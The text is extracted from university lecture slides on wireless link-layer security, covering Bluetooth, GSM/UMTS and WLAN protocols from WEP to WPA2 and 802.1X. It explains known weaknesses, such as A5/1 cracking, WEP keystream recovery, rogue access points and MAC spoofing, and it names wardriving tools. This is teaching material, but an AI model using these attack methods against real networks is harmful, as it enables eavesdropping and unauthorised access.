protocols (physical/data-link layer) - uni-luebeck.de€¦ · · 2015-05-05protocols...

Distributed Systems Security

PD Dr. Dennis Pfisterer

Institut für Telematik, Universität zu Lübeck

http://www.itm.uni-luebeck.de/people/pfisterer

Protocols (Physical/Data-Link Layer)

• Security on Different Layers

• Security on Physical & Data-Link Layer

Overview

– Mostly security in wireless networks

– Bluetooth

– GSM / GPRS / UMTS

– Wireless LANs (IEEE 802.11a/b/g, 802.11i)

Security - 07 Physical/Data Link Layer #2

Security on Different LayersSecurity on Different Layers

Security - 04 Cryptology #3

• Where do we place security mechanisms? – Pros and cons on different protocol layers?

• Physical / Data-Link Layer– E.g., Bluetooth, WEP/WPA/WPA2 in WLAN

Security on Different Layers

WEPMAC

LLCIP

LLC/MACPHY

• Network Layer– E.g., IPSec, L2TP

• Transport Layer– E.g., SSL/TLS

• Application Layer– E.g., PGP, Kerberos

Security - 06 Protocols #4

HTTP FTP SMTPTCP/UDP

IPSec

HTTP FTP SMTP

TCP/UDPIP

SSL/TLS

HTTP SMTPTCP

IP

S-MIMEPGPSETKerberos

UDP

LLC/MAC

• Protection of (some) individual links

+ Transparent for upper layers (i.e., IP, TCP, and application)+ Minimal changes in protocol stack

– Security for single hops only

Security in Lower Layers (PHY, DL)

– Security for single hops only– No end-to-end security– Not flexibly controllable by applications


directional radio

• Protection on the IP and/or TCP/UDP layer

+ Transparent for applications on network layer (IP � IPSec)

+ End-to-end security across unsecure infrastructures

+ Complete connections securable (e.g., using VPNs)

Security in Network/Transport Layer

+ Transport layer security controllable by /visible to applications (e.g., https

instead of http)

– IPSec not controllable by / visible to applications

– Transport layer (TCP over TLS) requires application changes


directional radio

end-to-end connection securityAny application

layer protocolE.g., FTP, Web Apps, SMTP,

POP, IMAP, ...

• Application security provided by the application

+ Flexibly controllable by applications

– Each application has its own custom-tailored security services

– No synergy between different applications

Security in Application Layer

– No synergy between different applications

– E.G. Kerberos, S/MIME, PGP, GnuPG provide their own implementations


directional radio

end-to-end connection securitySecure application

layer protocolE.g., PGP, S/MIME, SMTPs,

POPs, IMAPs, ...

BluetoothBluetooth

• Universal radio interface for ad-hoc wireless connectivity– Interconnect computers, peripherals, handhelds, smart phones, …

– Replacement of Infrared Data Association

Bluetooth (IEEE 802.15.1)

– Replacement of Infrared Data Association (IrDA) technology

• Embedded in other devices – Goal: less than 5€/device

– Short range (10 m)

– Low power consumption

– Voice and data transmission (~1 Mbit/s)


Bluetooth VersionsVersion Changes Year

1.0 /1.0B Non-standard, bad interoperability, never deployed at scale

1.1 Adds Received Signal Strength Indication (RSSI) 2002

1.2Less susceptible to noise due to adaptive frequency-

2003


1.2Less susceptible to noise due to adaptive frequency-hopping spread spectrum (AFH)

2003

2.0 + EDR Support for higher speeds (~2 Mbit/s) 2004

2.1 + EDRAdds secure simple pairing and support for quality of service

2007

3.0 + HS Discontinued 2009

4.0„Low Energy“ protocol stack and profiles (<5ms for connection setup), AES encryption

2009

• Time division multiplexing for send/receive separation

• Voice transmission– SCO (Synchronous Connection Oriented) traffic– FEC (forward error correction), no retransmission

Characteristics

– FEC (forward error correction), no retransmission– 64 kbit/s duplex, point-to-point, circuit switched

• Data transmission – ACL (Asynchronous ConnectionLess) traffic– Asynchronous, packet switched traffic support– 433.9 kbit/s symmetric traffic– 723.2 / 57.6 kbit/s asymmetric


• 2.4 GHz ISM band, 79 channels, 1 MHz spacing (2402…2480 MHz)

• Range / Device classes– class 1 (100mW); ~100m

– class 2 (2,5mW); ~10m

– class 3 (1mW); ~10cm

Characteristics

• Frequency hopping with 1600 hops/s– Hopping sequence in a pseudo random fashion, determined by a master


• Can it be used as a as security mechanism?

Frequency Hopping


• Collection of devices connected in an ad-hoc fashion

• One unit acts as master – Others are slaves for the lifetime of the Piconet

Bluetooth Piconet

M

S

SP

PPiconet

– Up to 7 simultaneous slaves per Piconet (> 200 could be parked)

• Master determines hopping pattern, slaves have to synchronize– Each Piconet has a unique hopping pattern

– Participation in a Piconet = synchronization to hopping sequence


M

P

SBSB S

SBSB

M Master

S Slave

P Parked

SB Standby

Bluetooth Security

E2

link key (128 bit)

Authentication key generation(permanent storage)

PIN (1-16 byte)

User input

Pairing

Authentication

E2

link key (128 bit)

PIN (1-16 byte)


E3

encryption key (128 bit)

payload key

Keystream generator

Data Data

Encryption key generation(temporary storage)

Encryption

Ciphering

E3

encryption key (128 bit)

payload key

Keystream generator

• Description of an Attack against Bluetooth– Details: http://www.tomsguide.com/us/how-to-bluesniper-pt1,review-408-9.html

Bluetooth Rifle

pt1,review-408-9.html

• „Rifle“ enables communication across large distances ~1km with standard Bluetooth devices

• What kind of Attacks?

Security - 07 Physical/Data Link Layer #16Image source: http://www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html

How can we attack confidentiality? See Below! Does it ring a bell?

Security Issue Remark

Short PINs are allowed. Weak PINs, which are used for the generation of link and encryption keys, can be easily guessed. People tend to select short PINs.

Attempts for authentication are repeated.

A limiting feature needs to be incorporated in the specification to prevent unlimited requests. The Bluetooth specification currently requires a time-out period between repeated attempts that will increase exponentially.


• Prior to Bluetooth v2.1, encryption is not required and can be turned off at any time. Moreover, the encryption key is only good for approximately 23.5 hours; using a single encryption key longer than this time allows simple XOR attacks to retrieve the encryption key.– Turning off encryption is required for several normal operations, so it is problematic to detect if encryption is disabled for a valid reason or for a security attack.

Security Summary Bluetooth

security attack.– Bluetooth v2.1 addresses this in the following ways:

• Encryption is required for all non-SDP (Service Discovery Protocol) connections• A new Encryption Pause and Resume feature is used for all normal operations requiring encryption to be disabled. This enables easy identification of normal operation from security attacks.

– The encryption key is required to be refreshed before it expires.

• Link keys may be stored on the device file system, not on the Bluetooth chip itself. Many Bluetooth chip manufacturers allow link keys to be stored on the device; however, if the device is removable this means that the link key will move with the device.


GSM / GPRS / UMTSGSM / GPRS / UMTS

• Pan-European standard – From European Telecommunications Standardization Institute (ETSI)

• Many providers world-wide use GSM

Global System for Mobile Communication

• Many providers world-wide use GSM– 219 countries in Asia, Africa, Europe, Australia, and America

– >4,2 billion subscribers in >700 networks

– >75% of all digital mobile phones use GSM

– >29 billion SMS in Germany in 2008 (>10% of revenues of many operators)

– More information: http://www.gsma.com


• Goal of GSM– Replace analog telephony systems (e.g., A-/B-/C-networks in Germany)

– Create a „mobile ISDN“

– Digital mobile telephony system allowing Europe-wide user mobility

– Mobile data services

GSM: Goals and Features

• Features– Communication:mobile and wireless; support voice and data

– Mobility: international access, SIM enables use of different providers

– Worldwide connectivity (one number, network handles localization)

– High quality: high audio quality and uninterrupted phone calls

– Security: access control, authentication via chip-card and PIN

21

GSM: Architecture

Fixed Network

MSC MSC

GMSCOMC, EIR, AUC HLRNSSwith

OSS

VLR

(G)MSC: (Gateway) Mobile Switching CenterBSC: Base Station ControllerBTS: Base Transceiver StationHLR, VLR: Home/Visitor Location RegisterOMC: Operation and Maintenance CenterEIR: Equipment Identity RegisterAUC: Authentication CenterMS: Mobile Station

VLR

BSC

BSC

RSS

BTS

BTS

BTS

BTS

BTS

MS + SIM

• SIM: Subscriber Identity Module

– Stores International Mobile Subscriber Identity (IMSI) and

Unique Serial Number (ICCID)

– Contains key material to identify and authenticate subscribers

– Two passwords: personal identification number (PIN) and

Personal Unblocking Code (PUK) for PIN unlocking

SIM Card: Features

Personal Unblocking Code (PUK) for PIN unlocking

• Hardware

– 8 or 16 bit CPU with 10 MHz clock rate, 40-100 kByte ROM, 1-3

kByte RAM, 16-64 kByte EEPROM

• Software

– Simple file system (three types of files, directory tree)

– Special communication protocol for SIM card access specified


• GSM intended to be no more vulnerable than a fixed phone– It’s a phone not a “secure communications device”

• Access control and authentication– User � SIM: secret PIN (personal identification number)

– SIM � network: challenge response method

GSM Security

– SIM � network: challenge response method

• Confidentiality– Voice, data, and signaling traffic encrypted on the wireless link

• Anonymity– TMSI (Temporary Mobile Subscriber Identity) newly assigned after each

location update

– Avoids tracking the location of users


• Three algorithms specified in GSM

– A3 for authentication (“secret”, open interface)

– A5 for encryption (standardized)

– A8 for key generation (“secret”, open interface)

GSM Security: Algorithms

– A8 for key generation (“secret”, open interface)

• “Secrecy” of these algorithms

– Kind of “security through obscurity”

– A3 and A8 available via the Internet

• Network providers can use stronger mechanisms


• Currently defined: A5/1, A5/2 and A5/3

• A5 algorithms are standardized to ensure global interoperability

• GSM phones currently (2012) support A5/1 and A5/2– Most networks use A5/1, some use A5/2

GSM Security: A5 Algorithm

– Most networks use A5/1, some use A5/2– A5/1 considered unsecure, can be broken in real-time [gsm-a5-1]– A5/1 and A5/2 specifications have restricted distribution but the details have been discovered and cryptanalysis has been published

• A5/3 quite new and will be phased in over the next few years– A5/3 is a codename for the block cipher KASUMI– Only limited deployment in Europe [gsmmap]


GSM: Authentication

RANDKi RAND KiRAND

GSM network SIM


A3

RANDKi

128 bit 128 bit

SRES* 32 bit

A3

RAND Ki

128 bit 128 bit

SRES 32 bit

SRES* =? SRES SRESSRES

32 bit

Authentication Center

Mobile Switching Center (MSC)

SIM

Ki: individual subscriber authentication key; SRES: signed response

GSM: Key Generation and Encryption

GSM network SIM

RANDKi RAND KiRAND

SIM

Security - 07 Physical/Data Link Layer #28Kc: cipher key

A8

128 bit 128 bit

Cipher Key Kc(64 Bit)

A8

128 bit 128 bit

SRESencrypteddata

Authentication Center

Broadcasting Subsystem (BSS)

SIM

A5

Kc

A5

Mobile Station (MS)

data data

• Based on a cheap mobile phone, laptop and free software

• Weakness in A5/1 encryption algorithm– Break into calls within minutes

– Decrypt and record calls with Temporary Mobile Subscriber

Attack on GSM (heise.de 12/2011)

– Decrypt and record calls with Temporary Mobile Subscriber Identity (TMSI) and secret key

• Can be used to impersonate a user’s identity– Initiate calls

– Send SMS

– User gets bill (including phone calls to premium services)

– Retrieve mailbox content


• Authentication– Only mobile station performs authentication – Network is not authenticated– Challenge-response procedure

• AUC generates challenge; VLR/MSC checks response from MS• Within network unencrypted transfer of data

GSM Security: Summary

• Within network unencrypted transfer of data

• Confidentiality– Only radio interface (between BTS and MS)– 64 Bit key length is quite small

• Between GSM-Providers– No security measures and standards defined


• Introduced to provide higher data speeds in GSM– Data transmission speeds of up to 171 kBit/s

– Packet switched instead of circuit switched data transmissions

– Requires new hardware (new radio transceivers at BTS, new backbone)

– Step towards UMTS

General Packet Radio Service (GPRS)

• Features– Uses sending slots only if data packets are to be transmitted

– E.g., for 50 kBit/s 4 slots are allocated temporarily

– Standardization 1998, introduction 2001

• Improvement: Enhanced Data Rates for GSM Evolution (EDGE)– Up to 384kbps; new radio technology

• GSN (GPRS Support Nodes): GGSN and SGSN

– GGSN (Gateway GSN): Interworking unit: GPRS and PDN (Packet Data Network)

– SGSN (Serving GSN): Supports the MS, performs location, billing, security, …

• GR (GPRS Register): user addresses (e.g., current IP, …)

GPRS architecture and interfaces

MS BSS GGSNSGSN

MSC

Um

EIR HLR/GRVLR

PDN

Gb Gn Gi

SGSN

Gn

• GPRS uses similar techniques like GSM

• Confidentiality, integrity, and authentication negotiated and initiated between MS and

GPRS Security

negotiated and initiated between MS and SGSN– Often, no security is negotiated

– Not visible to the user

• Users should use upper layer security solutions


• Universal Mobile Telecommunications System (UMTS)

– New radio network: UTRA (UMTS Terrestrial Radio Access)

– New backbone: UTRAN (UMTS Terrestrial Radio Access Network)

UMTS

– New SIM type: USIM (Universal Subscriber Identity Module)

– UMTS and GSM/EDGE share same core network (CN)

• Enhanced data rates

– UTMS: High Speed Packet Access (HSPA)• High Speed Downlink Packet Access (HSDPA): 337,5 Mbit/s

• High Speed Uplink Packet Access (HSUPA): 23 Mbit/s

Core Network: Architecture

BTS

Node B

BSC

Abis

BTS

BSS

MSC GMSC

VLR

Iu

PSTN

GSN GPRS Support NodesSGSN Service …GGSN Gateway …RNS Radio Network SubsystemRNC Radio Network Controller

Node BBTS

Node B

Node B

RNC

Iub

Node B

Node BSGSN GGSN

HLR

IuPS

IuCS

CN

EIR

GnGi

AuC

GR

RNS

• Builds on GSM security (inherits proven-to-be-good features)

• Correction of the GSM weaknesses

– Possible attacks from a faked base station

– Cipher keys and authentication data transmitted in clear between and

UMTS Security

– Cipher keys and authentication data transmitted in clear between and within networks

– Encryption not used in some networks � open to fraud

– Data integrity not provided

• Security features for 3G radio access networks and services

– Mutual Authentication

– Stronger Encryption

– Data Integrity


Wireless LANWireless LAN

• Also known as WLAN and WiFi– Specifies layer 1&2 (physical & data-link layer)

• Standards– IEEE 802.11 (1997: 1 / 2 Mbps, 2.4Ghz)

Wireless LAN Standards

– IEEE 802.11 (1997: 1 / 2 Mbps, 2.4Ghz)

– IEEE 802.11a (1999: max. 54 Mbps, 5 Ghz)

– IEEE 802.11b (1999: 5,5 Mbps and 11 Mbps, 2.4 Ghz)

– IEEE 802.11g (2003: 54 Mbps, 2.4 Ghz)

– IEEE 802.11n (2009: 150 Mbps, 2.4 / 5 GHz)

– IEEE 802.11i (2004, enhanced security)


• Access Point (AP)

– Bridge between wireless and wired networks

– Composed of

• Radio interface

• Wired network

802.11 Infrastructure Mode

• Wired network interface (usually 802.3)

• Bridging software

– Aggregates access for multiple wireless stations to wired network

• Wireless station


Basic Service Set(BSS) – single cell

Extended Service Set (ESS) – multiple cells

Access Point

Station

• Wireless LAN uses radio signals– Not limited to physical buildings

Interception

BSS

• Signal weakened by Walls, Floors, and Interference

• Directional antenna allows interception over longer distances


Station outsidebuilding perimeter

• Software

– Netstumbler

– THC-Wardrive

– Kismet

– Wellenreiter

– VisStumbler

Wardriving

– VisStumbler

– inSSIDer

• Laptop with (optional) GPS for logging

– MAC address & channel

– Network name (SSID)

– Manufacturer

– Signal strength /noise

– Location


Wardriving example


• APs send beacons (announce WiFi presence)– May include Service Set Identifier (SSID)– AP chosen on signal strength and observed error rates

• Client scans channels

Joining a BSS

• Client scans channels – Periodically or on weak signal– Check for stronger or more reliable APs– If one is found, it re-associates with new AP

• Open System Authentication– No authentication or encryption– Clients only specify SSID when requesting association


• Access points have Access Control Lists (ACL)

• ACL is list of allowed MAC addresses– E.g. Allow access to:

MAC Address locking

– E.g. Allow access to:• 00:01:42:0E:12:1F

• 00:01:42:F1:72:AE

• 00:01:42:4F:E2:01

• MAC addresses are sniffable and spoofable– ACLs are ineffective security technique


Wireless LANsWireless LANsWired Equivalent Privacy (WEP)

• Goal: Equivalent security like in LANs– LAN security features?

• Security Features of 802.11b– Authentication, Confidentiality, and Integrity

– Wired Equivalence Privacy (WEP)

802.11b Security Services (Wired Equivalence Privacy)

Local Area Network (LAN)

Equivalent – Wired Equivalence Privacy (WEP)

• Authentication: Shared Key– Key shared by all APs and clients of an ESS

– 802.11b defines no key management strategy

– Nightmare in large wireless LANs

• Confidentiality: RC4 encryption of data

• Integrity: Integrity Check Vector


802.11 wireless network

Equivalent Privacy

• Station requests association with Access Point

– Challenge-Response Scheme

• Procedure

WEP: Shared Key Authentication

1. AP sends random number to station

2. Station encrypts random number (using RC4, 40 bit shared key and 24 bit IV)

3. Encrypted random number sent to AP

4. AP decrypts received message (using the same key stream)

5. AP compares decrypted number with transmitted one (Step 1)

6. If numbers match, station knows shared secret key


• Integrity: compute Integrity Check Vector (ICV)

– 32 bit Cyclic Redundancy Check appended to message to create plaintext

• Confidentiality: plaintext encrypted via RC4

– Plaintext XORed with key stream of pseudo random bits

WEP: Packet Transmission

– Plaintext XORed with key stream of pseudo random bits

– Key stream is function of 40-bit secret key and 24 bit initialization vector


PRNG

32 bit CRC

⊕

IV

Ciphertext

||

||Data

Secret key

Initialization Vector (IV)

• Decryption: ciphertext decrypted via RC4– XORed with same key stream as sender – Generated from 40-bit secret key + 24 bit IV from packet– Key stream differs per packet (if different IV is used)

• Integrity: Compare received and decrypted ICV with CRC of received data

WEP: Packet Reception


PRNG

CRC

⊕IV

Ciphertext

||Secret key

Data

Compare

Plaintext

CRC

• IV must be different for every message– 802.11 standard doesn’t specify how IV is calculated

WEP: Initialization Vector

• Different implementations used– Simple incrementing counter for each message

– Alternating ascending and descending counters

– Some use a pseudo random IV generator

• Can be used for a variety of attacksSecurity - 07 Physical/Data Link Layer #50

• Attack by extracting a single key stream

– AP does not check if IV is reused

• Attack Shared Key Authentication

WEP: Authentication Weaknesses

• Attack Shared Key Authentication

– Challenge and response provide plain and ciphertext

– M1 ⊕ C1 = M1 ⊕ M1 ⊕ RC4(IV,K)= RC4(IV,K)

– Attacker gets a valid key stream

• May be used for authentication and sending encrypted messages


• No mutual authentication

– Only client is authenticated

– APs are not authenticated

WEP: Authentication Weaknesses

• Allows man-in-the-middle attacks

– Build and run own AP with same name

– Client connects to AP with best signal

– Attacker forwards messages to real AP


• WEP dangerous due to wrong key usage– Not because of the algorithm

– RC4 securely used in SSL/TLS

WEP: Summary

• Recommended measures– WLAN cannot be trusted– WLAN outside the Intranet separated by Firewall– Use higher layer Security Protocols to secure communication• PPTP, IPSec, SSL, SSH, …


Wireless LANsWireless LANsIEEE 802.11i (WPA & WPA2)

• After the collapse of WEP, IEEE started to develop a new

security architecture � 802.11i

• 802.11i novelties compared to WEP

Overview of 802.11i

– Access control model based on 802.1X

– Flexible authentication framework (using EAP)

• Authentication based on strong protocols (e.g., TLS)

• Authentication results in shared session key

– Different functions (encryption, integrity) use different keys derived

from the session key using a one-way function

– Improved encryption and integrity protection


• 802.11i defines concept of a Robust Security Network (RSN)– Integrity protection and encryption based on AES (not RC4 anymore)

– Good, but requires new hardware � no software update of routers possible

• For immediate security: updates to WEP – So-called pre-RSN networks

Overview of 802.11i

– So-called pre-RSN networks

– New protocol: Temporal Key Integrity Protocol (TKIP)

– Encryption based on RC4 but avoids WEP’s problems

– For integrity, a novel scheme is proposed (called Michael)

– Ugly solution, but runs on old hardware (after software upgrade)

• Industry names– TKIP �WPA (WiFi Protected Access)

– RSN �WPA2


WEP TKIP (WPA) CCMP (WPA2)

Algorithm RC4 RC4 AES

Key Length 40 / 104 Bit 128 Bit (enc.)64 Bit (auth.)

128 bit

Initialization 24 Bit IV 48 Bit IV -

802.11i Security Solutions

Initialization

Vector

24 Bit IV 48 Bit IV -

Integrity

Data CRC32 Michael CCM(Counter with CBC-MAC)

Header none Michael CCM

Replay Protection none IV-Check IV-Check

Key Management none 802.11i 4-Way-Handshake

802.11i 4-Way-Handshake


Wireless LANsWi-Fi Protected Access (WPA)

Wireless LANsWi-Fi Protected Access (WPA)

Temporal Key Integrity Protocol (TKIP)

• Runs on old hardware

– Uses RC4 for encryption with WEP weaknesses corrected

• Improved message integrity scheme

– New protection mechanism called Michael

TKIP

– New protection mechanism called Michael

– Message Integrity Check (MIC) value is added at SDU level before fragmentation into PDUs

– Implemented in the device driver (in software)

• Improved confidentiality scheme

– Per-packet keys to prevent attacks based on weak keys

– Increases IV length to 48 Bits to prevent IV reuse

– Use IV as replay counter


TKIP: Overview (High-Level)

Integrity Protection

Message


WEP Encryption

Encrypted and authenticated frames

Key Generation

WEP IV

WEP Key

Extended IV

Payload & MIC

TKIP: Integrity Protection

Message

64 Bit Key


Michael Algorithm

Message MIC

Source MAC

Destination MAC

Priority

WEP Frame

MIC? MAC?

TKIP: WEP Key Generation

MSB (32 Bit)LSB

(16 Bit)

Key Mixing (Phase 1)

Sequence Counter (48 Bit)

Source MAC(32 Bit)

WEP Key(128 Bit)


Key Mixing (Phase 2)

Fill ByteLow

Byte of Counter

High Byte of Counter

Packet-specific Key

80 Bit

Temporary WEP Key (128 Bit) used for encryption

WEP and TKIP: Encryption (High-Level)

Payload + WPA-MICMessage

CRC-32 Algorithm


Temporary WEP Key

(128 Bit) used for

encryption

MessageWEP-ICV

RC4

PayloadWEP-ICV

EncryptedMessage

TKIP: Overview (WEP Frame Details)

Integrity Protection

Message

Payload + MIC


WEP Encryption WEP-VerschlüsselungKey

Generation

IV + EIV

WEP IV

WEP Key

Payload + MIC

Encrypted and authenticated frames

MAC

Header

IV and

Key ID

EIV Payload MIC WEP ICV FCS

Wireless LANsCounter Mode with Cipher Block Chaining

Message Authentication Code Protocol (CCMP)

• Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)

• Standard encryption protocol for use with the

CCMP and WPA2

• Standard encryption protocol for use with the WPA2 standard

• Replaces

– RC4 stream-cipher with AES block cipher

– WEP ICV with (CBC-)MAC value based on AES


• Encryption

– Based on CTR mode (using AES); see chapter on cryptology

– Encrypts payload and MAC value to protect integrity and confidentiality

CCMP and WPA2

– Not encrypted: Headers of MAC (frame) and CCMP

• Integrity protection

– Cipher Block Chaining Message Authentication Code (CBC-MAC)

– Integrity protection based on CBC-MAC (using AES)

– See next slide


• Uses a block cipher to create a message authentication code (MAC)

CBC-MAC: Cipher Block Chaining MAC


Plaintext chunk #1

Block CipherKey �

⊕⊕⊕⊕

Plaintext chunk #2

Block CipherKey �

⊕⊕⊕⊕

Plaintext chunk #3

Block CipherKey �

⊕⊕⊕⊕

MAC

Initialization Vector (IV)

• CBC-MAC computed over – MAC header

– CCMP header

– Payload

CCMP: Integrity

– Payload

• Mutable fields are set to zero

• Input is padded with zeros if length is not multiple of 128 Bits


Wireless LANsWireless LANsIEEE 802.1X / EAP / PEAP

• Access to resources after successful authentication– IEEE 802.1X: EAP over Ethernet/LAN (EAPOL)

– For details on EAP see chapter on AAA

Authentication via IEEE 802.1X


Client (Supplicant)

Authenticator(e.g., access

point)

Authentication Server

(e.g., RADIUS)

IEEE 802.1X: EAP over Ethernet Arbitrary Protocol

EAP Messages

• 802.11 association happens first– Open authentication– Provides access to the AP and allows an IP address to be supplied

Association and Authentication

• Access beyond the AP is still prohibited– AP drops non-EAP traffic

• Authentication conversation between supplicant and authentication server– Wireless NIC and AP are pass through devices

• After authentication, AP allows full trafficSecurity - 07 Physical/Data Link Layer #72

Summary of the Protocol Architecturee.g., EAP-MS-CHAPv2

e.g., PEAP

EAP (RFC 3748)


Access Point Authentication ServerClient

EAPOL (802.1X)

802.11 (WiFi)

EAP over RADIUS (RFC 3579)

RADIUS protocol (RFC 2865)

TCP/IP

802.11, 802.1X, EAP (with CHAP + RADIUS)Supplicant

(WiFi Client)Supplicant

(WiFi Client)Authenticator(Access Point)

AuthenticationServer

802.11 association

EAPOL Start

EAP request for identity


EAP-response (identity)

EAP-request (challenge)

EAP-response (response)

EAP-succcess

EAPOW-key (WEP/CCMP)

Access-request

RADIUS-challenge

RADIUS-access-request

RADIUS-access-accept

Secure authenticated connection

• Authenticator and Client negotiate a private unicast key – Prevents other associated clients from eavesdropping on the communication

• Authenticator also provides a broadcast key

Result of successful authentication

• Authenticator also provides a broadcast key – For broadcast communication amongst all associated clients


802.11 AP802.11 Client 802.11 Client

Private Unicast Key Private Unicast Key

Shared Broadcast Key

• Users can roam to university-run Wi-Fis worldwide

Example: Eduroam (Germany)

• Authentication by home organization


• Requests are routed to the user’s home organization’s authentication server– Based on “realm”: username@realm

– E.g., [email protected]

Example: Eduroam (Germany)

– E.g., [email protected]

• Authentication– Uses a secure PEAP (TLS) tunnel to the server

– Server provides certificate to avoid man-in-the-middle attacks

– Authenticate using some EAP-method (e.g., MS-CHAPv2 at Lübeck)


1. Lübeck‘s RADIUS requests identity– Dennis replies with dennis@uni-

heidelberg.de

2. Realm is unknown to RADIUS server– Forwards all EAP packets to DFN central

RADIUS server

Example: Dennis visits Lübeck

Berlin

Lübeck

2.

4.

3. Berlin knows mapping <realm, RADIUS server> – Forwards packets to Heidelberg

4. Virtual EAP connection between Dennis’ computer and Heidelberg RADIUS server– Dennis authenticates against this server– Server presents certificate to authenticate

towards Dennis

5. After authentication, access is granted locally


Heidelberg

Berlin

3.

4.

Visitor from SF comes to Lübeck

Lübeck

New York Berlin


San FranciscoNew York Berlin

• Security has always been considered important for WiFi

– Early solution based on WEP seriously flawed

• New security standard for WiFi: 802.11i

– TKIP (WPA)

Summary on WiFi Security

– TKIP (WPA)• Uses RC4 � runs on old hardware

• Corrects WEP’s flaws

• Mandatory in WPA, optional in WPA2

– CCMP (WPA2)• Access control model based on 802.1X and EAP � Improved key management

• Uses AES in CCMP mode (CTR mode and CBC-MAC)

• Needs new hardware that supports AES

Security - 07 Physical/Data Link Layer 80/60

• Bluetooth

– Guide to Bluetooth Security, Recommendations of the National Institute of Standards and Technology Karen Scarfone, John Padgette 2008. http://csrc.nist.gov/publications/nistpubs/800-121/SP800-121.pdf

• GSM

– [28C3] Neue Angriffe auf GSM-Handys und Schutzmechanismen Heise Security. http://www.heise.de/security/meldung/28C3-Neue-Angriffe-auf-GSM-Handys-und-Schutzmechanismen-1401633.html

– [gsmmap] GSM security map: http://gsmmap.org; see also http://www.heise.de/security/meldung/SIGINT-Kaum-

Literature

– [gsmmap] GSM security map: http://gsmmap.org; see also http://www.heise.de/security/meldung/SIGINT-Kaum-Fortschritte-bei-der-GSM-Sicherheit-1579566.html

– [gsm-a5-1] Karsten Nohl and Chris Paget: GSM: SRSLY? http://events.ccc.de/congress/2009/Fahrplan/attachments/1519_26C3.Karsten.Nohl.GSM.pdf

• WiFi

– War Driving Tools http://www.wardrive.net/wardriving/tools/

– J. Schiller. Mobile Communications. 2. Auflage, Addison-Wesley, 2003 IEEE 802.11a/b/g/i Standards. http://standards.ieee.org/getieee802/802.11.html

– Nikita Borisov, Ian Goldberg, David Wagner. Intercepting mobile communications: the insecurity of 802.11. MOBICOM 2001, pp180-189.

– Scott R. Fluhrer, Itsik Mantin, Adi Shamir. Weaknesses in the Key Scheduling Algorithm of RC4. Selected Areas in Cryptography 2001: pp1-24.

– Clint Chaplin, Emily Qi, Henry Ptasinski, Jesse Walker, Sheung Li. 802.11i Overview. IEEE 802.11-04/0123r1, Februar 2005

– The Unofficial 802.11 Security Web Page http://www.drizzle.com/~aboba/IEEE/


protocols (physical/data-link layer) - uni-luebeck.de€¦ · · 2015-05-05protocols...

Documents